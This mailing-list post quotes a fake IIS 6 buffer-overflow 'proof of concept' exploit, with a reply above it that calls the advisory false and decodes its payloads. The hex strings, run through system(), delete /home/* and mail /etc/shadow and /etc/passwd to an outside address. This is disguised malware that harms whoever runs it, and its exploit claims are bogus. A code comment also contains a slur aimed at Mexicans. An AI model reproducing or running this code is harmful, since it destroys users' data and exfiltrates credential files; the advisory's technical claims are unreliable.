THIS ADVISORY IS FALSE!!!!!!!!!!!!!!!!!!!!!!!
"shellcode" is decoded to be: /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
"launcher" is decoded to be: cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
"netcat_shell" is decoded to be: cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
Day Jay wrote:
/* Proof of concept code Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you.
DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
IIS 6 Buffer Overflow Exploit
BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in.
VENDOR STATUS: Notified FIX: In process
Remote root.
eg. #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 + Connecting to host... + Connected. + Inserting Shellcode... + Done... + Spawining shell..
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>
*/ char shellcode[] = "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62" "\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";
char launcher [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
main() {
//Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode);
//int socket = 0; //double long port = 0.0;
//#DEFINE port host address //#DEFINE number of inters //#DEFINE gull eeuEE
// for(int j; j < 30; j++) { //Find socket remote address fault printf("."); } //overtake inetinfo here IIS_666666^ return 0; }
__________________________________ Do you Yahoo!? Plan great trips with Yahoo! Travel: Now over 17,000 guides!
http://travel.yahoo.com/p-travelguide
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
